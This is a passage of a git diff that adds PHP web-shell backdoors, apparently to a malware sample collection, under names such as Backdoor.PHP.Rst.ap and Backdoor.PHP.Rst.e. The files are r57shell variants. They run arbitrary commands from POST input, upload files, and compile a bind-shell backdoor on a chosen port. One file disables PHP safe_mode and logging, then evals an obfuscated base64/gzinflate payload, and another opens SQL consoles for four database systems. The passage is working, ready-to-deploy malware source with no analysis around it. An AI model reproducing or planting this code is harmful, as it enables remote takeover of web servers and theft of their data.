+BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; + +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> + +</head> +<body bgcolor="#e4e0d8"> +<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc> +<!-- logo --> +<font face=Verdana size=2>&nbsp;&nbsp; +<font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b> +</font> +</td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100> +<? +/* change dir */ +if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } +/* display information */ +echo "<font face=Verdana size=-2>"; +echo "<font color=blue><b>uname -a :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>"; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>"; +echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>"; +echo "&nbsp;&nbsp;&nbsp; ".exec("pwd").""; +echo "</b></font>"; +echo "</font>"; +?> +</td></tr></table> +<? +/* port bind */ +if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass'])) +{ + $w_file=fopen("/tmp/bd.c","ab+") or exit(); + fputs($w_file,$port_bind_bd_c); + fclose($w_file); + $_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd"; +} +?> +<? +/* alias execute */ +if (($_POST['alias']) AND ($_POST['alias']!=="")) + { + foreach ($aliases as $alias_name=>$alias_cmd) { + if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} + } + } +?> +<? +/* file upload */ +if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"])) +{ +copy($HTTP_POST_FILES["userfile"][tmp_name], + $_POST['dir']."/".$HTTP_POST_FILES["userfile"][name]) + or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>"); +} +?> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc> +<? +/* command execute */ +if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; } +echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>"; +echo "<b>"; +echo "<div align=center><textarea name=report cols=122 rows=15>"; +echo "".passthru($_POST['cmd']).""; +echo "</textarea></div>"; +echo "</b>"; +?> +</td></tr></table> +<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr> +<tr><td height=23> +<? +/* command execute form */ +echo "<form name=command method=post>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>"; +echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; } +echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">"; +echo "</font>"; +echo "</form>"; +?> +</td></tr></table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr> +<tr><td> +<? +/* file upload form */ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<input type=file name=userfile size=85>&nbsp;"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } +echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">"; +echo "</font>"; +echo "</form>"; +?> +</td></tr></table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr> +<tr><td> +<? +/* aliases form */ +echo "<form name=aliases method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<select name=alias>"; +foreach ($aliases as $alias_name=>$alias_cmd) + { + echo "<option>$alias_name</option>"; + } + echo "</select>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } +echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">"; +echo "</font>"; +echo "</form>"; +?> +</td></tr></table> + + +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr> +<tr><td> +<? +/* port bind form */ +echo "<form name=bind method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<input type=text name=port size=15 value=11457>&nbsp;"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } +echo "<input type=hidden name=bind size=1 value=bd.c>"; +echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt3]." \">"; +echo "</font>"; +echo "</form>"; +?> +</td></tr></table> + + + + +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc> +<? +echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.0 beta ]---o</b></font></div>"; +?> +</td></tr></table> + +<!-- don't delete this plz --> +<script language="javascript"> +hotlog_js="1.0"; +hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+ +escape(window.location.href); +document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N"); +</script><script language="javascript1.1"> +hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script> +<script language="javascript1.2"> +hotlog_js="1.2"; +hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+ +(((navigator.appName.substring(0,3)=="Mic"))? +screen.colorDepth:screen.pixelDepth)</script> +<script language="javascript1.3">hotlog_js="1.3"</script> +<script language="javascript">hotlog_r+="&js="+hotlog_js; +document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+ +" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+ +hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script> +<noscript><a href=http://click.hotlog.ru/?81606 target=_top><img +src="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0 +width="1" height="1" alt="HotLog"></a></noscript> +<!-- /don't delete this plz --> + + + +<? /* -------------------------[ EOF ]------------------------- */ ?> diff --git a/PHP/Backdoor.PHP.Rst.ap b/PHP/Backdoor.PHP.Rst.ap new file mode 100644 index 00000000..9033658c --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.ap @@ -0,0 +1,28 @@ +<? +error_reporting(0); + +$language='eng'; + +$auth = 0; + +$name='8cd59f852a590eb0565c98356ecb0b84'; +$pass='8cd59f852a590eb0565c98356ecb0b84'; + +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + +@ini_set('error_log',NULL); +@ini_set('log_errors',0); + +eval(gzinflate(base64_decode('      +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'))); +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.e b/PHP/Backdoor.PHP.Rst.e new file mode 100644 index 00000000..b975a95f --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.e @@ -0,0 +1,1873 @@ +<?php + + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "69"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ ~~~ */ + +// $auth = 1; - ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð²ÐºÐ»ÑŽÑ‡ÐµÐ½Ð° +// $auth = 0; - ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð²Ñ‹ÐºÐ»ÑŽÑ‡ÐµÐ½Ð° +$auth = 0; + +// Логин и пароль Ð´Ð»Ñ Ð´Ð¾Ñтупа к Ñкрипту +// ÐЕ ЗÐБУДЬТЕ СМЕÐИТЬ ПЕРЕД Ð ÐЗМЕЩЕÐИЕМ ÐРСЕРВЕРЕ!!! +$name='s4ND4L'; // логин Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ +$pass='test'; // пароль Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="Modified By s4ND4L"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://unsecured-clanz.com>Modified By s4ND4L</a> : Access Denied</b>"); + } +} +$head = '<!-- ЗдравÑтвуй ВаÑÑ --> +<html> +<head> +<title>---=Modified By Andika=--</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + 